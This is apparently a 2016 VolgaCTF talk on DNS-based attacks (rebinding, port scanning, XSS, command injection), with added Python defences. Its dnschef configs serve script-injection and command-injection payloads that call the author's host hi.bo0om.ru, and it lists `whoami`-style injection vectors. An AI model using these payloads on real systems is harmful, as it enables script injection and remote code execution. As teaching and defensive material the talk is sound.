VolgaCTF | Bo0oM - DNS and attacks

Post on 09-Jan-2017


2016

DNS and attacks

What is DNS?

The Domain Name System (DNS) is a hierarchical decentralized naming system for computers, services, or any resource connected to the Internet or a private network. It associates various information with domain names assigned to each of the participating entities. Most prominently, it translates more readily memorized domain names to the numerical IP addresses needed for the purpose of locating and identifying computer services and devices with the underlying network protocols. By providing a worldwide, distributed directory service, the Domain Name System is an essential component of the functionality of the Internet.

213.180.204.3 mycomputer.arpa
173.194.32.169 dennis.arpa
87.240.165.87 newoffice.arpa
173.252.89.132 test1122
10.28.114.254 it.chat.in-addr.arpa

Hosts.txt

Resource record types: A, KEY, DS, AAAA, DNSKEY, CNAME, MX, NS, PTR, SOA, TSIG, SRV, TXT

DNS and DDoS

dig -t axfr sitename.com

http://half-life.wikia.com/wiki/Half-Life_2_Beta
http://pixelsmashers.com/wordpress/?p=7866

DNS and SOP

What is SOP?

In computing, the same-origin policy is an important concept in the web application security model. Under the policy, a web browser permits scripts contained in a first web page to access data in a second web page, but only if both web pages have the same origin. An origin is defined as a combination of URI scheme, hostname, and port number. This policy prevents a malicious script on one page from obtaining access to sensitive data on another web page through that page's Document Object Model.

Same-origin policy

evil.xxx:
A 97.246.251.93
A 192.168.0.1

https://crypto.stanford.edu/dns/dns-rebinding.pdf
https://www.ptsecurity.com/download/DNS-rebinding.pdf

The resulting attack consists of the following steps:
1. The victim addresses the dns.evil.xxx domain.
2. The attacker's DNS server returns both IP addresses in the fixed order.
3. The browser redirects the request to the server at the external 97.246.251.93 IP address.
4. The server returns an HTML page containing JavaScript.
5. After the browser downloads the page, the client's JavaScript sends a request to the dns.evil.xxx domain.
6. After the request is received, the server script blocks the incoming connections with the victim's IP address.
7. After a while, the client's script re-addresses the dns.attacker.ru domain. Since the server returns RST from the 97.246.251.93 IP address, the request is redirected to the local server at 192.168.0.1.

Now the JavaScript is able to send any GET/POST/HEAD requests to an application at 97.246.251.93, as well as process the received responses and send the results to the attacker.

DNS and ports

evil.xxx:
A 1.2.3.4
A 4.3.2.1
A 192.168.1.1

?

test.evil.xxx  192.168.1.1
test.evil.xxx  report1.host
test2.evil.xxx 192.168.1.2
test2.evil.xxx report2.host
test3.evil.xxx 192.168.1.3
test3.evil.xxx report3.host
test4.evil.xxx 192.168.1.4
test4.evil.xxx report4.host

cat /etc/hosts


192.168.1.3:3306 - open port

create page: <img src="http://test.evil.xxx:3306">


cat /etc/hosts
test.evil.xxx (192.168.1.1) err
test.evil.xxx (report1.host) ok, redirect

test2.evil.xxx (192.168.1.2) err
test2.evil.xxx (report2.host) ok, redirect

test3.evil.xxx (192.168.1.2) ok!

test3.evil.xxx report3.host
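Both the rebinding walkthrough above and the port-scan variant (one probe name per internal address, each answered with an internal IP plus a reporting host) rely on a public name resolving to a private address. The following is an added example, not code from the talk or from any of the tools it mentions: a resolver-side filter in the spirit of dnsmasq's --stop-dns-rebind option, which drops private, loopback and link-local answers for names outside your own internal zones, plus the application-side Host-header check that stops a rebound request even if the answer got through. The sample answer table, the zone name corp.internal and the address 192.168.1.9 are constructed for the example.

```python
import ipaddress
import re

# Constructed sample data (not from the slides): the two-address answer the
# talk describes for dns.evil.xxx, one probe name from the port-scan slides,
# and an ordinary public name (IP taken from the hosts file slide).
SAMPLE_ANSWERS = {
    "dns.evil.xxx": ["97.246.251.93", "192.168.0.1"],
    "test.evil.xxx": ["192.168.1.1"],
    "www.example.com": ["173.194.32.169"],
}


def is_internal(addr: str) -> bool:
    """True for answers a name outside your own zones should never return:
    RFC 1918 / ULA, loopback, link-local, multicast, reserved, or unparsable."""
    try:
        ip = ipaddress.ip_address(addr)
    except ValueError:
        return True  # an unparsable answer is treated as untrusted
    return (ip.is_private or ip.is_loopback or ip.is_link_local
            or ip.is_multicast or ip.is_reserved or ip.is_unspecified)


def filter_rebinding(name, answers, internal_zones=()):
    """Split an answer set into (kept, dropped).

    Internal addresses are dropped unless `name` lies under one of
    `internal_zones`, the only place a legitimately internal answer should
    come from. An empty `kept` list means the client gets no address at all
    instead of the internal one, which is what defeats the rebind."""
    fqdn = name.rstrip(".").lower()
    if any(fqdn == z or fqdn.endswith("." + z) for z in internal_zones):
        return list(answers), []
    kept, dropped = [], []
    for answer in answers:
        (dropped if is_internal(answer) else kept).append(answer)
    return kept, dropped


_PORT_SUFFIX = re.compile(r":\d+$")


def host_header_ok(host_header, expected_hosts):
    """Application-side check. A rebound request arrives at the internal
    service carrying Host: dns.evil.xxx, so refusing any Host value that is
    not one of the names/addresses the service is actually served under
    stops the attack even when the resolver let the answer through."""
    host = _PORT_SUFFIX.sub("", host_header.strip()).lower()
    return host in {h.lower() for h in expected_hosts}


def audit(answers_by_name, internal_zones=()):
    """Run the resolver filter over a whole answer table and return the names
    whose answers contained an internal address (what a log or alert would
    carry)."""
    flagged = {}
    for name, answers in answers_by_name.items():
        _, dropped = filter_rebinding(name, answers, internal_zones)
        if dropped:
            flagged[name] = dropped
    return flagged


if __name__ == "__main__":
    for name, dropped in audit(SAMPLE_ANSWERS).items():
        print(f"{name}: dropped internal answer(s) {dropped}")
```

The filter is deliberately applied per name rather than per response: the port-scan variant works precisely because each probe name mixes an internal address with a public reporting host, so dropping only the internal record and returning the public one is enough to make every probe look like a closed port.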

DNS and DoS

ns.hack.bo0om.ru. 0 IN NS ns.hack.bo0om.ru.

DNS and XSS

https://news.ycombinator.com/item?id=8336025
http://www.serveradminblog.com/2014/09/xss-via-dns/

Dnschef

[NS] # Queries for mail server records
*.xss.hack.bo0om.ru="-->'></script><script/src=//hi.bo0om.ru/js/?ns></script>

[MX] # Queries for mail server records
*.xss.hack.bo0om.ru="-->'></script><script/src=//hi.bo0om.ru/js/?cname></script>

[CNAME] # Queries for alias records
*.xss.hack.bo0om.ru="-->'></script><script/src=//hi.bo0om.ru/js/?cname></script>

http://thesprawl.org/projects/dnschef/
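The XSS here lands in whatever web page displays DNS lookup results without treating record data as untrusted input. As an added example, not code from the talk, from dnschef or from the linked write-ups, here is the vulnerable rendering pattern beside the fixed one in Python; the sample record list and the domain name in the calls are constructed, and the NS payload string is the one the slide serves.

```python
import html

# Constructed sample lookup result (not from the slides): the NS value the
# dnschef config above hands out, next to an ordinary MX record.
SAMPLE_RECORDS = [
    ("NS", "-->'></script><script/src=//hi.bo0om.ru/js/?ns></script>"),
    ("MX", "10 mail.example.com."),
]


def render_records_unsafe(domain, records):
    """The vulnerable pattern: DNS-derived strings pasted straight into HTML.
    The leading --> in the payload is there to close an HTML comment or
    attribute the page may have wrapped the value in; after that the
    <script> tag is live."""
    rows = "".join(f"<tr><td>{rtype}</td><td>{data}</td></tr>"
                   for rtype, data in records)
    return f"<!-- results for {domain} --><table>{rows}</table>"


def _esc(value):
    # quote=True also escapes ' and " so the result is safe in attributes.
    return html.escape(value, quote=True)


def render_records_safe(domain, records):
    """Hardened: every string that came out of DNS (and the looked-up name
    itself, which is also user input) is escaped before it enters the page."""
    rows = "".join(f"<tr><td>{_esc(rtype)}</td><td>{_esc(data)}</td></tr>"
                   for rtype, data in records)
    return f'<table data-domain="{_esc(domain)}">{rows}</table>'


def contains_script_tag(rendered):
    """Check used to compare the two renderers: did a DNS-supplied value
    survive as an executable tag?"""
    return "<script" in rendered.lower()


if __name__ == "__main__":
    print(render_records_safe("xss.hack.bo0om.ru", SAMPLE_RECORDS))
```

Escaping at output time is the general fix; validating record data against the syntax the record type allows (hostname characters for NS/CNAME/MX targets) is a useful second layer but not a substitute, since TXT records legitimately carry arbitrary text.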

DNS and RCE

RCE vectors & whoami

`whoami`

$(whoami)

'&whoami

"&whoami

With $IFS at its default value (space, tab, newline), ${IFS} expands to whitespace, so a payload can separate a command from its arguments without containing a literal space.

Dnschef

[NS] # Queries for mail server records
*.rce.hack.bo0om.ru=&$(curl${IFS}https://hi.bo0om.ru/?rce)&curl https://hi.bo0om.ru/?rce&'\"`0&$(curl${IFS}https://hi.bo0om.ru/?rce)&curl https://hi.bo0om.ru/?rce&`'

[MX] # Queries for mail server records
*.rce.hack.bo0om.ru=&$(curl${IFS}https://hi.bo0om.ru/?rce)&curl https://hi.bo0om.ru/?rce&'\"`0&$(curl${IFS}https://hi.bo0om.ru/?rce)&curl https://hi.bo0om.ru/?rce&`'

[CNAME] # Queries for alias records
*.rce.hack.bo0om.ru=&$(curl${IFS}https://hi.bo0om.ru/?rce)&curl https://hi.bo0om.ru/?rce&'\"`0&$(curl${IFS}https://hi.bo0om.ru/?rce)&curl https://hi.bo0om.ru/?rce&`'
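The records above only become code execution in a tool that takes a record value (an NS, MX or CNAME target) and hands it to a shell. As an added example, not code from the talk or from dnschef, the following Python shows that vulnerable pattern next to the hardened one: validate the value as a DNS hostname before use, and build an argv list for subprocess with shell=False so no shell ever parses it. The host(1) invocation, the `runner` parameter and the sample names in the test calls are assumptions made for the example; the `$(whoami)` and backtick fragments come from the slide.

```python
import re
import subprocess

# One DNS label: 1-63 letters, digits or hyphens, not starting or ending
# with a hyphen (RFC 1123). Anything with $, `, quotes, &, spaces or other
# shell metacharacters fails this test by construction.
_LABEL = re.compile(r"^(?!-)[a-z0-9-]{1,63}(?<!-)$")


def safe_hostname(name):
    """Return the normalised hostname if `name` is syntactically a DNS
    hostname, else None."""
    fqdn = name.strip().rstrip(".").lower()
    if not fqdn or len(fqdn) > 253:
        return None
    if not all(_LABEL.match(label) for label in fqdn.split(".")):
        return None
    return fqdn


def unsafe_command(ns_target):
    """The vulnerable pattern: the record value becomes part of a shell
    string that is later run with os.system() or shell=True, so $(...),
    backticks and & are interpreted by the shell."""
    return "host " + ns_target


def build_probe_argv(ns_target):
    """Hardened: validate first, then return an argv list. With shell=False
    each element is passed to the program verbatim, so even a value that
    slipped past validation is never expanded by a shell."""
    fqdn = safe_hostname(ns_target)
    if fqdn is None:
        return None
    return ["host", "-t", "A", fqdn]


def probe(ns_target, runner=subprocess.run):
    """Run the lookup safely; `runner` is injectable so this can be exercised
    without network access. Returns None when the value was rejected."""
    argv = build_probe_argv(ns_target)
    if argv is None:
        return None
    return runner(argv, capture_output=True, text=True, timeout=5, shell=False)


if __name__ == "__main__":
    for candidate in ("ns1.hack.bo0om.ru.", "ns1.$(whoami).evil.xxx"):
        print(candidate, "->", build_probe_argv(candidate))
```

Validation rejects the payloads on this slide outright, and the argv form means a future record type whose legitimate syntax is wider than a hostname (TXT, for instance) still cannot reach a shell.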

DNS and SQL injection, OOB, DNS hijacking, DNS cache poisoning, DNS flood...

Anton “Bo0oM” Lopanitsyn

https://bo0om.ru

@i_bo0om

Questions?